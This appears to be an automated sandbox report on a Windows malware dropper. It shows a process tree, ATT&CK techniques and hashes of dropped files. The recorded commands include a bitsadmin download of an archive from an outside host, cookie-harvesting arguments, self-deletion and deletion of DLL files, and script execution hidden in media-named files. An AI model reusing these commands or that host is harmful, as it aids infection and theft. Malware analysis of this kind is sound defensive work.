                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1720,8254229296317467913,4793279901852841639,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4904 /prefetch:8
                                                                                              9⤵
                                                                                                PID:5192
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              "cmd.exe" /C taskkill /F /PID 3308 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe"
                                                                                              8⤵
                                                                                                PID:4976
                                                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                                                  taskkill /F /PID 3308
                                                                                                  9⤵
                                                                                                  • Kills process with taskkill
                                                                                                  PID:856
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                "cmd.exe" /C taskkill /F /PID 3308 && choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\Documents\H2FPUwSf6aILHhe6H9UU2FRh.exe"
                                                                                                8⤵
                                                                                                  PID:3520
                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                    taskkill /F /PID 3308
                                                                                                    9⤵
                                                                                                    • Kills process with taskkill
                                                                                                    PID:5644
                                                                                            • C:\Users\Admin\Documents\SA0C9MpxhoM_IUwqIORfO9gu.exe
                                                                                              "C:\Users\Admin\Documents\SA0C9MpxhoM_IUwqIORfO9gu.exe"
                                                                                              6⤵
                                                                                              • Executes dropped EXE
                                                                                              • Loads dropped DLL
                                                                                              • Drops file in Program Files directory
                                                                                              PID:4632
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8177.tmp\tempfile.ps1"
                                                                                                7⤵
                                                                                                  PID:5536
                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8177.tmp\tempfile.ps1"
                                                                                                  7⤵
                                                                                                    PID:4528
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8177.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:4764
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8177.tmp\tempfile.ps1"
                                                                                                    7⤵
                                                                                                      PID:5400
                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8177.tmp\tempfile.ps1"
                                                                                                      7⤵
                                                                                                        PID:5588
                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8177.tmp\tempfile.ps1"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:2080
                                                                                                        • C:\Windows\System32\Conhost.exe
                                                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                          8⤵
                                                                                                            PID:4604
                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nst8177.tmp\tempfile.ps1"
                                                                                                          7⤵
                                                                                                          • Blocklisted process makes network request
                                                                                                          • Executes dropped EXE
                                                                                                          • Loads dropped DLL
                                                                                                          • Checks processor information in registry
                                                                                                          PID:5012
                                                                                                        • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                          "bitsadmin" /Transfer helper http://fsstoragecloudservice.com/data/data.7z C:\zip.7z
                                                                                                          7⤵
                                                                                                          • Download via BitsAdmin
                                                                                                          PID:6008
                                                                                                      • C:\Users\Admin\Documents\_3YwqLObFBjLEDY5txjW4XMu.exe
                                                                                                        "C:\Users\Admin\Documents\_3YwqLObFBjLEDY5txjW4XMu.exe"
                                                                                                        6⤵
                                                                                                          PID:2080
                                                                                                          • C:\Users\Admin\Documents\_3YwqLObFBjLEDY5txjW4XMu.exe
                                                                                                            "C:\Users\Admin\Documents\_3YwqLObFBjLEDY5txjW4XMu.exe" -a
                                                                                                            7⤵
                                                                                                            • Executes dropped EXE
                                                                                                            PID:1264
                                                                                                        • C:\Users\Admin\Documents\wLGo4KcuWzauIuzTC0N_ZRn_.exe
                                                                                                          "C:\Users\Admin\Documents\wLGo4KcuWzauIuzTC0N_ZRn_.exe"
                                                                                                          6⤵
                                                                                                          • Executes dropped EXE
                                                                                                          PID:4168
                                                                                                          • C:\Users\Admin\Documents\wLGo4KcuWzauIuzTC0N_ZRn_.exe
                                                                                                            "C:\Users\Admin\Documents\wLGo4KcuWzauIuzTC0N_ZRn_.exe"
                                                                                                            7⤵
                                                                                                              PID:5712
                                                                                                          • C:\Users\Admin\Documents\ETzcAxCEpspPg1mqLS9ZheBm.exe
                                                                                                            "C:\Users\Admin\Documents\ETzcAxCEpspPg1mqLS9ZheBm.exe"
                                                                                                            6⤵
                                                                                                            • Executes dropped EXE
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:4296
                                                                                                          • C:\Users\Admin\Documents\ubHE83QRHXgM_BbH6_P0wjkr.exe
                                                                                                            "C:\Users\Admin\Documents\ubHE83QRHXgM_BbH6_P0wjkr.exe"
                                                                                                            6⤵
                                                                                                              PID:5012
                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /c taskkill /im ubHE83QRHXgM_BbH6_P0wjkr.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\ubHE83QRHXgM_BbH6_P0wjkr.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                7⤵
                                                                                                                  PID:5876
                                                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                    taskkill /im ubHE83QRHXgM_BbH6_P0wjkr.exe /f
                                                                                                                    8⤵
                                                                                                                    • Kills process with taskkill
                                                                                                                    PID:2924
                                                                                                                  • C:\Windows\SysWOW64\timeout.exe
                                                                                                                    timeout /t 6
                                                                                                                    8⤵
                                                                                                                    • Delays execution with timeout.exe
                                                                                                                    PID:3868
                                                                                                              • C:\Users\Admin\Documents\_Sh3TE1ZbAIFVhf_fDhdG2st.exe
                                                                                                                "C:\Users\Admin\Documents\_Sh3TE1ZbAIFVhf_fDhdG2st.exe"
                                                                                                                6⤵
                                                                                                                • Executes dropped EXE
                                                                                                                PID:4324
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 656
                                                                                                                  7⤵
                                                                                                                  • Program crash
                                                                                                                  PID:5772
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 668
                                                                                                                  7⤵
                                                                                                                  • Program crash
                                                                                                                  PID:5888
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 628
                                                                                                                  7⤵
                                                                                                                  • Program crash
                                                                                                                  PID:6064
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 736
                                                                                                                  7⤵
                                                                                                                  • Program crash
                                                                                                                  PID:5128
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 1120
                                                                                                                  7⤵
                                                                                                                  • Program crash
                                                                                                                  PID:5484
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 1100
                                                                                                                  7⤵
                                                                                                                  • Program crash
                                                                                                                  PID:5656
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 1152
                                                                                                                  7⤵
                                                                                                                  • Program crash
                                                                                                                  PID:4772
                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4324 -s 1180
                                                                                                                  7⤵
                                                                                                                  • Program crash
                                                                                                                  • Suspicious behavior: MapViewOfSection
                                                                                                                  PID:3732
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "_Sh3TE1ZbAIFVhf_fDhdG2st.exe" /f & erase "C:\Users\Admin\Documents\_Sh3TE1ZbAIFVhf_fDhdG2st.exe" & exit
                                                                                                                  7⤵
                                                                                                                    PID:4604
                                                                                                                    • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                      taskkill /im "_Sh3TE1ZbAIFVhf_fDhdG2st.exe" /f
                                                                                                                      8⤵
                                                                                                                      • Kills process with taskkill
                                                                                                                      PID:5676
                                                                                                                • C:\Users\Admin\Documents\NnggirbTI2jZu_E1EQ_tMIGQ.exe
                                                                                                                  "C:\Users\Admin\Documents\NnggirbTI2jZu_E1EQ_tMIGQ.exe"
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:4916
                                                                                                                  • C:\Users\Admin\Documents\NnggirbTI2jZu_E1EQ_tMIGQ.exe
                                                                                                                    C:\Users\Admin\Documents\NnggirbTI2jZu_E1EQ_tMIGQ.exe
                                                                                                                    7⤵
                                                                                                                    • Executes dropped EXE
                                                                                                                    PID:5148
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c sonia_6.exe
                                                                                                              4⤵
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:2528
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\sonia_6.exe
                                                                                                                sonia_6.exe
                                                                                                                5⤵
                                                                                                                • Executes dropped EXE
                                                                                                                • Adds Run key to start application
                                                                                                                • Suspicious use of WriteProcessMemory
                                                                                                                PID:776
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:2716
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                  C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                  6⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  • Checks processor information in registry
                                                                                                                  • Modifies data under HKEY_USERS
                                                                                                                  • Modifies registry class
                                                                                                                  PID:2300
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              C:\Windows\system32\cmd.exe /c sonia_7.exe
                                                                                                              4⤵
                                                                                                                PID:3152
                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2316 -s 540
                                                                                                                4⤵
                                                                                                                • Program crash
                                                                                                                • Suspicious behavior: EnumeratesProcesses
                                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                                PID:2136
                                                                                                        • \??\c:\windows\system32\svchost.exe
                                                                                                          c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                                          1⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          • Modifies registry class
                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                          • Suspicious use of WriteProcessMemory
                                                                                                          PID:2240
                                                                                                          • C:\Windows\system32\svchost.exe
                                                                                                            C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                            2⤵
                                                                                                              PID:2300
                                                                                                            • C:\Windows\system32\svchost.exe
                                                                                                              C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                              2⤵
                                                                                                              • Drops file in System32 directory
                                                                                                              • Checks processor information in registry
                                                                                                              • Modifies data under HKEY_USERS
                                                                                                              • Modifies registry class
                                                                                                              PID:4856
                                                                                                          • C:\Windows\system32\rUNdlL32.eXe
                                                                                                            rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                            1⤵
                                                                                                            • Process spawned unexpected child process
                                                                                                            • Suspicious use of WriteProcessMemory
                                                                                                            PID:3392
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
                                                                                                              2⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Modifies registry class
                                                                                                              • Suspicious behavior: EnumeratesProcesses
                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                              • Suspicious use of WriteProcessMemory
                                                                                                              PID:1128
                                                                                                          • C:\Windows\system32\rundll32.exe
                                                                                                            rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                            1⤵
                                                                                                            • Process spawned unexpected child process
                                                                                                            PID:5768
                                                                                                            • C:\Windows\SysWOW64\rundll32.exe
                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                              2⤵
                                                                                                              • Loads dropped DLL
                                                                                                              • Modifies registry class
                                                                                                              PID:3080
                                                                                                          • \??\c:\windows\system32\svchost.exe
                                                                                                            c:\windows\system32\svchost.exe -k netsvcs -s seclogon
                                                                                                            1⤵
                                                                                                              PID:5964
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1D53.exe
                                                                                                              C:\Users\Admin\AppData\Local\Temp\1D53.exe
                                                                                                              1⤵
                                                                                                                PID:5856
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\219A.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\219A.exe
                                                                                                                1⤵
                                                                                                                  PID:4044
                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\219A.exe
                                                                                                                    C:\Users\Admin\AppData\Local\Temp\219A.exe
                                                                                                                    2⤵
                                                                                                                      PID:5712
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\219A.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\219A.exe
                                                                                                                      2⤵
                                                                                                                        PID:3960
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\2A36.exe
                                                                                                                      C:\Users\Admin\AppData\Local\Temp\2A36.exe
                                                                                                                      1⤵
                                                                                                                        PID:5984
                                                                                                                        • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                          cmd /c start c.exe & start l.exe
                                                                                                                          2⤵
                                                                                                                            PID:2604
                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\c.exe
                                                                                                                              c.exe
                                                                                                                              3⤵
                                                                                                                                PID:5476
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  "C:\Windows\System32\cmd.exe" /c cmd < Parlasse.wmv
                                                                                                                                  4⤵
                                                                                                                                    PID:3380
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      cmd
                                                                                                                                      5⤵
                                                                                                                                        PID:4920
                                                                                                                                        • C:\Windows\SysWOW64\findstr.exe
                                                                                                                                          findstr /V /R "^hqVLSBiFVkisDvgANWfHkkgqnFPqUPdvHQlUgqiIGEuNwqJAbhcZzXvwMVhhLiKuVLKNjzkNOHwGyBYbVfCGzdrKzoozMTXmTqRddWgreIkLVQWlWPacEtMEHZxtk$" Ove.wmv
                                                                                                                                          6⤵
                                                                                                                                            PID:4480
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                            Puramente.exe.com m
                                                                                                                                            6⤵
                                                                                                                                              PID:216
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com
                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Puramente.exe.com m
                                                                                                                                                7⤵
                                                                                                                                                  PID:5512
                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                ping GFBFPSXA -n 30
                                                                                                                                                6⤵
                                                                                                                                                • Runs ping.exe
                                                                                                                                                PID:5664
                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\l.exe
                                                                                                                                          l.exe
                                                                                                                                          3⤵
                                                                                                                                            PID:5464
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\2FA5.exe
                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\2FA5.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:4828
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            "C:\Windows\System32\cmd.exe" /c taskkill /im 2FA5.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\2FA5.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                            2⤵
                                                                                                                                              PID:2272
                                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                taskkill /im 2FA5.exe /f
                                                                                                                                                3⤵
                                                                                                                                                • Kills process with taskkill
                                                                                                                                                PID:1692
                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                timeout /t 6
                                                                                                                                                3⤵
                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                PID:5720
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\36BB.exe
                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\36BB.exe
                                                                                                                                            1⤵
                                                                                                                                              PID:5812
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\45EE.exe
                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\45EE.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:5148
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\45EE.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\45EE.exe
                                                                                                                                                  2⤵
                                                                                                                                                    PID:632
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\4BFA.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\4BFA.exe
                                                                                                                                                  1⤵
                                                                                                                                                    PID:5272
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\4BFA.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\4BFA.exe
                                                                                                                                                      2⤵
                                                                                                                                                        PID:5956
                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\784B.exe
                                                                                                                                                      C:\Users\Admin\AppData\Local\Temp\784B.exe
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4972
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7D8C.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\7D8C.exe
                                                                                                                                                        1⤵
                                                                                                                                                          PID:5648
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\83B7.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\83B7.exe
                                                                                                                                                          1⤵
                                                                                                                                                            PID:4760
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\8917.exe
                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\8917.exe
                                                                                                                                                            1⤵
                                                                                                                                                              PID:5608
                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5536
                                                                                                                                                              • C:\Windows\explorer.exe
                                                                                                                                                                C:\Windows\explorer.exe
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4916
                                                                                                                                                                • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                  C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:4400
                                                                                                                                                                  • C:\Windows\explorer.exe
                                                                                                                                                                    C:\Windows\explorer.exe
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:5228
                                                                                                                                                                    • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4580
                                                                                                                                                                      • C:\Windows\explorer.exe
                                                                                                                                                                        C:\Windows\explorer.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:5672
                                                                                                                                                                        • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:2376
                                                                                                                                                                          • C:\Windows\explorer.exe
                                                                                                                                                                            C:\Windows\explorer.exe
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:5168
                                                                                                                                                                            • C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              C:\Windows\SysWOW64\explorer.exe
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:3172

                                                                                                                                                                              Network

                                                                                                                                                                              MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                              Persistence

                                                                                                                                                                              Modify Existing Service

                                                                                                                                                                              1
                                                                                                                                                                              T1031

                                                                                                                                                                              Registry Run Keys / Startup Folder

                                                                                                                                                                              1
                                                                                                                                                                              T1060

                                                                                                                                                                              BITS Jobs

                                                                                                                                                                              1
                                                                                                                                                                              T1197

                                                                                                                                                                              Defense Evasion

                                                                                                                                                                              Modify Registry

                                                                                                                                                                              3
                                                                                                                                                                              T1112

                                                                                                                                                                              Disabling Security Tools

                                                                                                                                                                              1
                                                                                                                                                                              T1089

                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                              1
                                                                                                                                                                              T1497

                                                                                                                                                                              BITS Jobs

                                                                                                                                                                              1
                                                                                                                                                                              T1197

                                                                                                                                                                              Install Root Certificate

                                                                                                                                                                              1
                                                                                                                                                                              T1130

                                                                                                                                                                              Credential Access

                                                                                                                                                                              Credentials in Files

                                                                                                                                                                              3
                                                                                                                                                                              T1081

                                                                                                                                                                              Discovery

                                                                                                                                                                              Query Registry

                                                                                                                                                                              6
                                                                                                                                                                              T1012

                                                                                                                                                                              Virtualization/Sandbox Evasion

                                                                                                                                                                              1
                                                                                                                                                                              T1497

                                                                                                                                                                              System Information Discovery

                                                                                                                                                                              6
                                                                                                                                                                              T1082

                                                                                                                                                                              Peripheral Device Discovery

                                                                                                                                                                              1
                                                                                                                                                                              T1120

                                                                                                                                                                              Remote System Discovery

                                                                                                                                                                              1
                                                                                                                                                                              T1018

                                                                                                                                                                              Collection

                                                                                                                                                                              Data from Local System

                                                                                                                                                                              3
                                                                                                                                                                              T1005

                                                                                                                                                                              Command and Control

                                                                                                                                                                              Web Service

                                                                                                                                                                              1
                                                                                                                                                                              T1102

                                                                                                                                                                              Replay Monitor

                                                                                                                                                                              Loading Replay Monitor...

                                                                                                                                                                              Downloads

                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                MD5

                                                                                                                                                                                f7dcb24540769805e5bb30d193944dce

                                                                                                                                                                                SHA1

                                                                                                                                                                                e26c583c562293356794937d9e2e6155d15449ee

                                                                                                                                                                                SHA256

                                                                                                                                                                                6b88c6ac55bbd6fea0ebe5a760d1ad2cfce251c59d0151a1400701cb927e36ea

                                                                                                                                                                                SHA512

                                                                                                                                                                                cb5ad678b0ef642bf492f32079fe77e8be20c02de267f04b545df346b25f3e4eb98bb568c4c2c483bb88f7d1826863cb515b570d620766e52476c8ee2931ea94

                                                                                                                                                                              • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157
                                                                                                                                                                                MD5

                                                                                                                                                                                3f9d9e0942a079c337939333653a947c

                                                                                                                                                                                SHA1

                                                                                                                                                                                34fdfdfff52d97997cb0f09d0020cd4122d3a855

                                                                                                                                                                                SHA256

                                                                                                                                                                                ea2eba0405ccbccdbd039b1aaeb108afb42b77cc5fcfed9d351c2f0784513e18

                                                                                                                                                                                SHA512

                                                                                                                                                                                0f96e4a23111d296b4d4cd21e3ba1a8067ea4b41f176c0cea78667923681d337fc82503dd5e665affb399700037a7f9090c72b3409c238fa611f5af3a5fc317d

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\libcurl.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                SHA1

                                                                                                                                                                                028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                SHA256

                                                                                                                                                                                0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                SHA512

                                                                                                                                                                                857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\libcurlpp.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                SHA1

                                                                                                                                                                                b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                SHA256

                                                                                                                                                                                43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                SHA512

                                                                                                                                                                                9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\libgcc_s_dw2-1.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                SHA1

                                                                                                                                                                                64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                SHA256

                                                                                                                                                                                59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                SHA512

                                                                                                                                                                                0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\libstdc++-6.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                SHA1

                                                                                                                                                                                8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                SHA256

                                                                                                                                                                                97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                SHA512

                                                                                                                                                                                666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\libwinpthread-1.dll
                                                                                                                                                                                MD5

                                                                                                                                                                                1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                SHA1

                                                                                                                                                                                fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                SHA256

                                                                                                                                                                                509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                SHA512

                                                                                                                                                                                3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\setup_install.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                SHA1

                                                                                                                                                                                e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                SHA256

                                                                                                                                                                                0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                SHA512

                                                                                                                                                                                c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\7zS0A4D4274\setup_install.exe
                                                                                                                                                                                MD5

                                                                                                                                                                                a3ca32ebdba2c07c2d386bb31cbd6d51

                                                                                                                                                                                SHA1

                                                                                                                                                                                e7841e1f475f922d5264b5ce5d123a1b3927f9e6

                                                                                                                                                                                SHA256

                                                                                                                                                                                0ab2a0bdb8e7a72b5eacb1af5325036266987c5d00b13a981c95754a94f55b1b

                                                                                                                                                                                SHA512

                                                                                                                                                                                c8abd3a0c8004c11462bf139a873311333cbe6c26046810844199f67d6dd9d7196a7e168261013c50bcb9f24a6bdd37879f617d7aa2089d2a067cb6ca09cbaea

